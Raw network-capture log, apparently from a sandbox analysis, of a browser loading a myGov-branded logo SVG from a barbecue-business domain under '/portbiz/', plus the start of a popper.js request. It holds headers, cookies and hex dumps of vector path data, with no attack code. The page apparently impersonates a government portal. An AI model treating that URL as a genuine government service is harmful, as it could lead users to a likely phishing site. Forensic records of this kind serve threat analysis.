                                                        2024-12-25 01:23:13 UTC1369INData Raw: 2e 34 36 2c 34 2e 34 36 2c 30 2c 30 2c 30 2d 32 2e 32 31 2e 35 36 2c 38 2e 33 39 2c 38 2e 33 39 2c 30 2c 30 2c 30 2d 32 2e 31 35 2c 31 2e 37 35 76 2d 31 2e 38 38 68 2d 35 2e 39 32 76 2e 35 38 61 31 2e 38 36 2c 31 2e 38 36 2c 30 2c 30 2c 31 2c 31 2e 32 36 2e 35 32 2c 34 2e 31 38 2c 34 2e 31 38 2c 30 2c 30 2c 31 2c 2e 33 31 2c 32 2e 30 36 76 38 2e 32 31 61 34 2e 32 37 2c 34 2e 32 37 2c 30 2c 30 2c 31 2d 2e 32 37 2c 32 2c 31 2e 37 39 2c 31 2e 37 39 2c 30 2c 30 2c 31 2d 31 2e 33 2e 35 39 76 2e 35 36 68 37 2e 33 36 76 2d 2e 35 36 61 31 2e 35 38 2c 31 2e 35 38 2c 30 2c 30 2c 31 2d 31 2e 31 34 2d 2e 35 34 2c 34 2e 33 38 2c 34 2e 33 38 2c 30 2c 30 2c 31 2d 2e 33 2d 32 2e 30 37 76 2d 37 2e 37 39 71 31 2e 31 35 2d 31 2e 39 32 2c 32 2e 34 39 2d 31 2e 39 32 61 31 2e
                                                        Data Ascii: .46,4.46,0,0,0-2.21.56,8.39,8.39,0,0,0-2.15,1.75v-1.88h-5.92v.58a1.86,1.86,0,0,1,1.26.52,4.18,4.18,0,0,1,.31,2.06v8.21a4.27,4.27,0,0,1-.27,2,1.79,1.79,0,0,1-1.3.59v.56h7.36v-.56a1.58,1.58,0,0,1-1.14-.54,4.38,4.38,0,0,1-.3-2.07v-7.79q1.15-1.92,2.49-1.92a1.
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 33 2d 31 2c 35 2e 39 33 2c 35 2e 39 33 2c 30 2c 30 2c 30 2d 35 2c 32 2e 33 33 2c 38 2e 35 35 2c 38 2e 35 35 2c 30 2c 30 2c 30 2d 31 2e 38 31 2c 35 2e 34 34 2c 38 2e 34 34 2c 38 2e 34 34 2c 30 2c 30 2c 30 2c 31 2e 37 38 2c 35 2e 33 33 2c 36 2c 36 2c 30 2c 30 2c 30 2c 35 2c 32 2e 33 41 36 2e 32 33 2c 36 2e 32 33 2c 30 2c 30 2c 30 2c 32 30 30 2e 39 2c 31 37 30 61 38 2e 34 31 2c 38 2e 34 31 2c 30 2c 30 2c 30 2c 31 2e 35 37 2d 35 2e 31 38 2c 39 2e 31 38 2c 39 2e 31 38 2c 30 2c 30 2c 30 2d 2e 38 36 2d 34 2c 36 2e 32 35 2c 36 2e 32 35 2c 30 2c 30 2c 30 2d 32 2e 34 37 2d 32 2e 37 38 5a 6d 2d 31 2e 35 36 2c 31 31 2e 34 39 61 32 2e 35 38 2c 32 2e 35 38 2c 30 2c 30 2c 31 2d 2e 38 2c 31 2e 34 38 2c 31 2e 37 36 2c 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 31 37 2e 33 39
                                                        Data Ascii: 3-1,5.93,5.93,0,0,0-5,2.33,8.55,8.55,0,0,0-1.81,5.44,8.44,8.44,0,0,0,1.78,5.33,6,6,0,0,0,5,2.3A6.23,6.23,0,0,0,200.9,170a8.41,8.41,0,0,0,1.57-5.18,9.18,9.18,0,0,0-.86-4,6.25,6.25,0,0,0-2.47-2.78Zm-1.56,11.49a2.58,2.58,0,0,1-.8,1.48,1.76,1.76,0,0,1-1.17.39
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 32 34 30 2e 33 2c 31 35 37 2e 31 61 33 2e 37 35 2c 33 2e 37 35 2c 30 2c 30 2c 30 2d 32 2e 30 39 2e 37 34 2c 31 30 2e 35 2c 31 30 2e 35 2c 30 2c 30 2c 30 2d 32 2e 35 34 2c 33 76 2d 33 2e 33 68 2d 35 2e 39 34 76 2e 35 38 61 32 2e 32 38 2c 32 2e 32 38 2c 30 2c 30 2c 31 2c 31 2c 2e 32 37 2c 31 2e 32 34 2c 31 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 35 2e 36 34 2c 35 2e 36 38 2c 35 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 33 2c 31 2e 35 39 76 38 41 34 2e 38 32 2c 34 2e 38 32 2c 30 2c 30 2c 31 2c 32 33 31 2c 31 37 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2d 31 2e 32 38 2e 35 31 76 2e 35 36 68 37 2e
                                                        Data Ascii: transform="translate(-23 -22)"/><path class="cls-1" d="M240.3,157.1a3.75,3.75,0,0,0-2.09.74,10.5,10.5,0,0,0-2.54,3v-3.3h-5.94v.58a2.28,2.28,0,0,1,1,.27,1.24,1.24,0,0,1,.45.64,5.68,5.68,0,0,1,.13,1.59v8A4.82,4.82,0,0,1,231,171a1.7,1.7,0,0,1-1.28.51v.56h7.
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 33 2e 38 31 2d 32 2e 36 34 2c 34 2e 37 34 2c 34 2e 37 34 2c 30 2c 30 2c 30 2d 32 2e 32 34 2e 35 33 2c 38 2c 38 2c 30 2c 30 2c 30 2d 32 2e 32 2c 31 2e 38 31 76 2d 31 2e 39 31 48 32 36 30 76 2e 35 38 61 31 2e 38 31 2c 31 2e 38 31 2c 30 2c 30 2c 31 2c 31 2e 32 36 2e 35 32 2c 34 2e 30 36 2c 34 2e 30 36 2c 30 2c 30 2c 31 2c 2e 33 31 2c 32 2e 30 36 76 38 2e 32 31 61 34 2e 33 33 2c 34 2e 33 33 2c 30 2c 30 2c 31 2d 2e 32 36 2c 32 2c 31 2e 38 32 2c 31 2e 38 32 2c 30 2c 30 2c 31 2d 31 2e 33 31 2e 35 39 76 2e 35 36 68 37 2e 35 76 2d 2e 35 36 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 31 2e 32 38 2d 2e 35 38 2c 34 2e 35 33 2c 34 2e 35 33 2c 30 2c 30 2c 31 2d 2e 32 39 2d 32 76 2d 37 2e 38 31 61 36 2c 36 2c 30 2c 30 2c 31 2c 31 2e 35 36 2d 31 2e 36 35 2c 32 2e
                                                        Data Ascii: 3.81-2.64,4.74,4.74,0,0,0-2.24.53,8,8,0,0,0-2.2,1.81v-1.91H260v.58a1.81,1.81,0,0,1,1.26.52,4.06,4.06,0,0,1,.31,2.06v8.21a4.33,4.33,0,0,1-.26,2,1.82,1.82,0,0,1-1.31.59v.56h7.5v-.56a1.62,1.62,0,0,1-1.28-.58,4.53,4.53,0,0,1-.29-2v-7.81a6,6,0,0,1,1.56-1.65,2.
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 2e 34 38 2c 33 2e 34 38 2c 30 2c 30 2c 30 2d 32 2e 33 35 2d 2e 37 39 2c 34 2e 34 38 2c 34 2e 34 38 2c 30 2c 30 2c 30 2d 32 2e 32 31 2e 35 36 2c 38 2e 32 2c 38 2e 32 2c 30 2c 30 2c 30 2d 32 2e 31 34 2c 31 2e 37 35 76 2d 31 2e 38 38 48 32 39 38 76 2e 35 38 61 31 2e 38 31 2c 31 2e 38 31 2c 30 2c 30 2c 31 2c 31 2e 32 36 2e 35 32 2c 34 2c 34 2c 30 2c 30 2c 31 2c 2e 33 32 2c 32 2e 30 36 76 38 2e 32 31 61 34 2e 34 32 2c 34 2e 34 32 2c 30 2c 30 2c 31 2d 2e 32 37 2c 32 2c 31 2e 38 2c 31 2e 38 2c 30 2c 30 2c 31 2d 31 2e 33 31 2e 35 39 76 2e 35 36 68 37 2e 33 36 76 2d 2e 35 36 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 31 2e 31 34 2d 2e 35 34 2c 34 2e 34 32 2c 34 2e 34 32 2c 30 2c 30 2c 31 2d 2e 32 39 2d 32 2e 30 37 76 2d 37 2e 37 39 71 31 2e 31 34 2d 31 2e
                                                        Data Ascii: .48,3.48,0,0,0-2.35-.79,4.48,4.48,0,0,0-2.21.56,8.2,8.2,0,0,0-2.14,1.75v-1.88H298v.58a1.81,1.81,0,0,1,1.26.52,4,4,0,0,1,.32,2.06v8.21a4.42,4.42,0,0,1-.27,2,1.8,1.8,0,0,1-1.31.59v.56h7.36v-.56a1.62,1.62,0,0,1-1.14-.54,4.42,4.42,0,0,1-.29-2.07v-7.79q1.14-1.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.449764104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:12 UTC1083OUTGET /portbiz/images/myGov-cobranded-logo-white.svg HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://yungbucksbbq.com/portbiz/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:13 UTC1077INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:13 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        Cache-Control: max-age=5184000
                                                        Pragma: public
                                                        Last-Modified: Wed, 11 Dec 2024 06:10:16 GMT
                                                        Expires: Fri, 21 Feb 2025 14:30:35 GMT
                                                        CF-Cache-Status: HIT
                                                        Age: 125558
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w4gbuHdPiodmX9xFJqVv2ESLM7NBNNBDtug4eoyBlr4XBdRmlsvYlwB1hYhPADLJnCXMUaVYmxcndAdkiGi5z2%2FOAHU9z%2FPKLIvaHIMd6TVsy%2FIvhYPv4y%2FK6JkKvslLcjZ%2B"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f7506464d34c34f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1453&rtt_var=551&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1661&delivery_rate=1972972&cwnd=181&unsent_bytes=0&cid=027fa53b2e09fc03&ts=449&x=0"
                                                        2024-12-25 01:23:13 UTC292INData Raw: 37 63 34 32 0d 0a 3c 73 76 67 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 39 33 2e 34 37 20 31 35 30 2e 35 37 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 63 6c 73 2d 31 7b 66 69 6c 6c 3a 23 66 66 66 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 34 32 30 2c 32 32 2e 30 39 61 38 2e 37 36 2c 38 2e 37 36 2c 30 2c 30 2c 30 2d 38 2e 37 36 2c 38 2e 37 36 56 35 33 2e 35 31 4c 34 35 35 2c 39 37 2e 33 33 6c 2d 34 33 2e 38 32 2c 34 33 2e 38 31 76 32 32 2e 36 37 41 38 2e 37 35 2c 38 2e
                                                        Data Ascii: 7c42<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 693.47 150.57"><defs><style>.cls-1{fill:#fff;}</style></defs><path class="cls-1" d="M420,22.09a8.76,8.76,0,0,0-8.76,8.76V53.51L455,97.33l-43.82,43.81v22.67A8.75,8.
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 35 2c 32 34 2e 36 35 61 38 2e 37 35 2c 38 2e 37 35 2c 30 2c 30 2c 30 2d 36 2e 32 2d 32 2e 35 36 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 33 38 32 2e 33 31 2c 32 34 2e 36 33 61 38 2e 37 36 2c 38 2e 37 36 2c 30 2c 30 2c 30 2d 31 34 2e 39 33 2c 36 2e 32 32 56 31 36 33 2e 37 38 61 38 2e 37 36 2c 38 2e 37 36 2c 30 2c 30 2c 30 2c 31 35 2c 36 2e 31 38 6c 32 38 2e 38 31 2d 32 38 2e 38 32 56 35 33 2e 35 31 4c 33 38 32 2e 33 31 2c 32 34 2e 36 33 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 34 32 2e 31
                                                        Data Ascii: 5,24.65a8.75,8.75,0,0,0-6.2-2.56Z" transform="translate(-23 -22)"/><path class="cls-1" d="M382.31,24.63a8.76,8.76,0,0,0-14.93,6.22V163.78a8.76,8.76,0,0,0,15,6.18l28.81-28.82V53.51L382.31,24.63Z" transform="translate(-23 -22)"/><path class="cls-1" d="M42.1
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 33 61 33 2e 33 33 2c 33 2e 33 33 2c 30 2c 30 2c 31 2d 2e 35 35 2e 36 37 2e 39 32 2e 39 32 2c 30 2c 30 2c 31 2d 2e 34 34 2e 31 2c 31 2e 34 36 2c 31 2e 34 36 2c 30 2c 30 2c 31 2d 2e 36 39 2d 2e 32 33 2c 35 2c 35 2c 30 2c 30 2c 30 2d 32 2e 32 39 2d 2e 35 38 2c 34 2e 32 33 2c 34 2e 32 33 2c 30 2c 30 2c 30 2d 33 2e 33 36 2c 31 2e 33 37 2c 34 2e 36 2c 34 2e 36 2c 30 2c 30 2c 30 2d 31 2e 31 34 2c 33 2c 34 2e 33 38 2c 34 2e 33 38 2c 30 2c 30 2c 30 2c 31 2c 32 2e 38 31 2c 31 36 2e 34 2c 31 36 2e 34 2c 30 2c 30 2c 30 2c 33 2e 30 38 2c 32 2e 35 32 2c 31 31 2e 34 32 2c 31 31 2e 34 32 2c 30 2c 30 2c 31 2c 32 2e 30 38 2c 31 2e 36 35 2c 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2c 2e 34 37 2c 31 2e 32 39 2c 31 2e 35 33 2c 31 2e 35 33 2c 30 2c 30 2c 31 2d 2e 34 38 2c
                                                        Data Ascii: 3a3.33,3.33,0,0,1-.55.67.92.92,0,0,1-.44.1,1.46,1.46,0,0,1-.69-.23,5,5,0,0,0-2.29-.58,4.23,4.23,0,0,0-3.36,1.37,4.6,4.6,0,0,0-1.14,3,4.38,4.38,0,0,0,1,2.81,16.4,16.4,0,0,0,3.08,2.52,11.42,11.42,0,0,1,2.08,1.65,1.92,1.92,0,0,1,.47,1.29,1.53,1.53,0,0,1-.48,
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 2e 31 31 2c 30 2c 30 2c 30 2c 31 2e 34 33 2e 35 33 2c 31 2e 35 35 2c 31 2e 35 35 2c 30 2c 30 2c 30 2c 31 2e 32 31 2d 2e 35 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 30 2c 2e 35 32 2d 31 2e 36 32 2c 32 2c 32 2c 30 2c 30 2c 30 2d 2e 35 34 2d 31 2e 35 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 31 2e 33 38 2d 2e 35 34 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 31 30 37 2e 38 35 2c 31 37 30 2e 32 38 61 2e 35 36 2e 35 36 2c 30 2c 30 2c 31 2d 2e 33 36 2d 2e 31 32 2e 37 39 2e 37 39 2c 30 2c 30 2c 31 2d 2e 32 33 2d 2e 33 38 2c 36 2c 36 2c 30 2c 30 2c 31 2d 2e 30 38 2d 31 2e 32 36 76 2d 35 2e 36 34 61 31 32 2e 35 31
                                                        Data Ascii: .11,0,0,0,1.43.53,1.55,1.55,0,0,0,1.21-.57,2.39,2.39,0,0,0,.52-1.62,2,2,0,0,0-.54-1.51,1.77,1.77,0,0,0-1.38-.54Z" transform="translate(-23 -22)"/><path class="cls-1" d="M107.85,170.28a.56.56,0,0,1-.36-.12.79.79,0,0,1-.23-.38,6,6,0,0,1-.08-1.26v-5.64a12.51
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 30 2c 30 2c 30 2d 31 2e 37 2d 34 2e 31 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 30 2d 31 2e 36 39 2e 37 31 2c 32 2e 33 2c 32 2e 33 2c 30 2c 30 2c 30 2d 2e 37 2c 31 2e 37 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 31 32 34 2e 33 31 2c 31 36 39 2e 30 35 56 31 35 37 2e 35 33 68 2d 36 2e 31 76 2e 35 38 61 31 2e 39 2c 31 2e 39 2c 30 2c 30 2c 31 2c 31 2e 33 39 2e 34 39 2c 33 2e 34 34 2c 33 2e 34 34 2c 30 2c 30 2c 31 2c 2e 33 35 2c 32 76 38 2e 34 39 61 33 2e 34 36 2c 33 2e 34 36 2c 30 2c 30 2c 31 2d 2e 33 31 2c 31 2e 39 2c 31 2e 39 2c 31 2e 39 2c 30 2c 30 2c 31 2d 31 2e 34 33 2e 35 36 76 2e 35 36 68 37 2e 38 35 76 2d 2e 35 36
                                                        Data Ascii: 0,0,0-1.7-4.1,2.25,2.25,0,0,0-1.69.71,2.3,2.3,0,0,0-.7,1.7Z" transform="translate(-23 -22)"/><path class="cls-1" d="M124.31,169.05V157.53h-6.1v.58a1.9,1.9,0,0,1,1.39.49,3.44,3.44,0,0,1,.35,2v8.49a3.46,3.46,0,0,1-.31,1.9,1.9,1.9,0,0,1-1.43.56v.56h7.85v-.56
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 2e 34 36 2c 30 2c 30 2c 30 2d 32 2e 32 31 2e 35 36 2c 38 2e 33 39 2c 38 2e 33 39 2c 30 2c 30 2c 30 2d 32 2e 31 35 2c 31 2e 37 35 76 2d 31 2e 38 38 68 2d 35 2e 39 32 76 2e 35 38 61 31 2e 38 36 2c 31 2e 38 36 2c 30 2c 30 2c 31 2c 31 2e 32 36 2e 35 32 2c 34 2e 31 38 2c 34 2e 31 38 2c 30 2c 30 2c 31 2c 2e 33 31 2c 32 2e 30 36 76 38 2e 32 31 61 34 2e 32 37 2c 34 2e 32 37 2c 30 2c 30 2c 31 2d 2e 32 37 2c 32 2c 31 2e 37 39 2c 31 2e 37 39 2c 30 2c 30 2c 31 2d 31 2e 33 2e 35 39 76 2e 35 36 68 37 2e 33 36 76 2d 2e 35 36 61 31 2e 35 38 2c 31 2e 35 38 2c 30 2c 30 2c 31 2d 31 2e 31 34 2d 2e 35 34 2c 34 2e 33 38 2c 34 2e 33 38 2c 30 2c 30 2c 31 2d 2e 33 2d 32 2e 30 37 76 2d 37 2e 37 39 71 31 2e 31 35 2d 31 2e 39 32 2c 32 2e 34 39 2d 31 2e 39 32 61 31 2e 31 32 2c 31 2e
                                                        Data Ascii: .46,0,0,0-2.21.56,8.39,8.39,0,0,0-2.15,1.75v-1.88h-5.92v.58a1.86,1.86,0,0,1,1.26.52,4.18,4.18,0,0,1,.31,2.06v8.21a4.27,4.27,0,0,1-.27,2,1.79,1.79,0,0,1-1.3.59v.56h7.36v-.56a1.58,1.58,0,0,1-1.14-.54,4.38,4.38,0,0,1-.3-2.07v-7.79q1.15-1.92,2.49-1.92a1.12,1.
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 2e 39 33 2c 35 2e 39 33 2c 30 2c 30 2c 30 2d 35 2c 32 2e 33 33 2c 38 2e 35 35 2c 38 2e 35 35 2c 30 2c 30 2c 30 2d 31 2e 38 31 2c 35 2e 34 34 2c 38 2e 34 34 2c 38 2e 34 34 2c 30 2c 30 2c 30 2c 31 2e 37 38 2c 35 2e 33 33 2c 36 2c 36 2c 30 2c 30 2c 30 2c 35 2c 32 2e 33 41 36 2e 32 33 2c 36 2e 32 33 2c 30 2c 30 2c 30 2c 32 30 30 2e 39 2c 31 37 30 61 38 2e 34 31 2c 38 2e 34 31 2c 30 2c 30 2c 30 2c 31 2e 35 37 2d 35 2e 31 38 2c 39 2e 31 38 2c 39 2e 31 38 2c 30 2c 30 2c 30 2d 2e 38 36 2d 34 2c 36 2e 32 35 2c 36 2e 32 35 2c 30 2c 30 2c 30 2d 32 2e 34 37 2d 32 2e 37 38 5a 6d 2d 31 2e 35 36 2c 31 31 2e 34 39 61 32 2e 35 38 2c 32 2e 35 38 2c 30 2c 30 2c 31 2d 2e 38 2c 31 2e 34 38 2c 31 2e 37 36 2c 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 31 37 2e 33 39 2c 31 2e 37 2c
                                                        Data Ascii: .93,5.93,0,0,0-5,2.33,8.55,8.55,0,0,0-1.81,5.44,8.44,8.44,0,0,0,1.78,5.33,6,6,0,0,0,5,2.3A6.23,6.23,0,0,0,200.9,170a8.41,8.41,0,0,0,1.57-5.18,9.18,9.18,0,0,0-.86-4,6.25,6.25,0,0,0-2.47-2.78Zm-1.56,11.49a2.58,2.58,0,0,1-.8,1.48,1.76,1.76,0,0,1-1.17.39,1.7,
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 32 34 30 2e 33 2c 31 35 37 2e 31 61 33 2e 37 35 2c 33 2e 37 35 2c 30 2c 30 2c 30 2d 32 2e 30 39 2e 37 34 2c 31 30 2e 35 2c 31 30 2e 35 2c 30 2c 30 2c 30 2d 32 2e 35 34 2c 33 76 2d 33 2e 33 68 2d 35 2e 39 34 76 2e 35 38 61 32 2e 32 38 2c 32 2e 32 38 2c 30 2c 30 2c 31 2c 31 2c 2e 32 37 2c 31 2e 32 34 2c 31 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 35 2e 36 34 2c 35 2e 36 38 2c 35 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 33 2c 31 2e 35 39 76 38 41 34 2e 38 32 2c 34 2e 38 32 2c 30 2c 30 2c 31 2c 32 33 31 2c 31 37 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2d 31 2e 32 38 2e 35 31 76 2e 35 36 68 37 2e 38 36 76 2d 2e
                                                        Data Ascii: sform="translate(-23 -22)"/><path class="cls-1" d="M240.3,157.1a3.75,3.75,0,0,0-2.09.74,10.5,10.5,0,0,0-2.54,3v-3.3h-5.94v.58a2.28,2.28,0,0,1,1,.27,1.24,1.24,0,0,1,.45.64,5.68,5.68,0,0,1,.13,1.59v8A4.82,4.82,0,0,1,231,171a1.7,1.7,0,0,1-1.28.51v.56h7.86v-.
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 32 2e 36 34 2c 34 2e 37 34 2c 34 2e 37 34 2c 30 2c 30 2c 30 2d 32 2e 32 34 2e 35 33 2c 38 2c 38 2c 30 2c 30 2c 30 2d 32 2e 32 2c 31 2e 38 31 76 2d 31 2e 39 31 48 32 36 30 76 2e 35 38 61 31 2e 38 31 2c 31 2e 38 31 2c 30 2c 30 2c 31 2c 31 2e 32 36 2e 35 32 2c 34 2e 30 36 2c 34 2e 30 36 2c 30 2c 30 2c 31 2c 2e 33 31 2c 32 2e 30 36 76 38 2e 32 31 61 34 2e 33 33 2c 34 2e 33 33 2c 30 2c 30 2c 31 2d 2e 32 36 2c 32 2c 31 2e 38 32 2c 31 2e 38 32 2c 30 2c 30 2c 31 2d 31 2e 33 31 2e 35 39 76 2e 35 36 68 37 2e 35 76 2d 2e 35 36 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 31 2e 32 38 2d 2e 35 38 2c 34 2e 35 33 2c 34 2e 35 33 2c 30 2c 30 2c 31 2d 2e 32 39 2d 32 76 2d 37 2e 38 31 61 36 2c 36 2c 30 2c 30 2c 31 2c 31 2e 35 36 2d 31 2e 36 35 2c 32 2e 30 38 2c 32 2e
                                                        Data Ascii: 2.64,4.74,4.74,0,0,0-2.24.53,8,8,0,0,0-2.2,1.81v-1.91H260v.58a1.81,1.81,0,0,1,1.26.52,4.06,4.06,0,0,1,.31,2.06v8.21a4.33,4.33,0,0,1-.26,2,1.82,1.82,0,0,1-1.31.59v.56h7.5v-.56a1.62,1.62,0,0,1-1.28-.58,4.53,4.53,0,0,1-.29-2v-7.81a6,6,0,0,1,1.56-1.65,2.08,2.
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 2e 34 38 2c 30 2c 30 2c 30 2d 32 2e 33 35 2d 2e 37 39 2c 34 2e 34 38 2c 34 2e 34 38 2c 30 2c 30 2c 30 2d 32 2e 32 31 2e 35 36 2c 38 2e 32 2c 38 2e 32 2c 30 2c 30 2c 30 2d 32 2e 31 34 2c 31 2e 37 35 76 2d 31 2e 38 38 48 32 39 38 76 2e 35 38 61 31 2e 38 31 2c 31 2e 38 31 2c 30 2c 30 2c 31 2c 31 2e 32 36 2e 35 32 2c 34 2c 34 2c 30 2c 30 2c 31 2c 2e 33 32 2c 32 2e 30 36 76 38 2e 32 31 61 34 2e 34 32 2c 34 2e 34 32 2c 30 2c 30 2c 31 2d 2e 32 37 2c 32 2c 31 2e 38 2c 31 2e 38 2c 30 2c 30 2c 31 2d 31 2e 33 31 2e 35 39 76 2e 35 36 68 37 2e 33 36 76 2d 2e 35 36 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 31 2e 31 34 2d 2e 35 34 2c 34 2e 34 32 2c 34 2e 34 32 2c 30 2c 30 2c 31 2d 2e 32 39 2d 32 2e 30 37 76 2d 37 2e 37 39 71 31 2e 31 34 2d 31 2e 39 32 2c 32 2e
                                                        Data Ascii: .48,0,0,0-2.35-.79,4.48,4.48,0,0,0-2.21.56,8.2,8.2,0,0,0-2.14,1.75v-1.88H298v.58a1.81,1.81,0,0,1,1.26.52,4,4,0,0,1,.32,2.06v8.21a4.42,4.42,0,0,1-.27,2,1.8,1.8,0,0,1-1.31.59v.56h7.36v-.56a1.62,1.62,0,0,1-1.14-.54,4.42,4.42,0,0,1-.29-2.07v-7.79q1.14-1.92,2.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.449770104.17.24.144432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:13 UTC388OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                        Host: cdnjs.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-12-25 01:23:14 UTC959INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:13 GMT
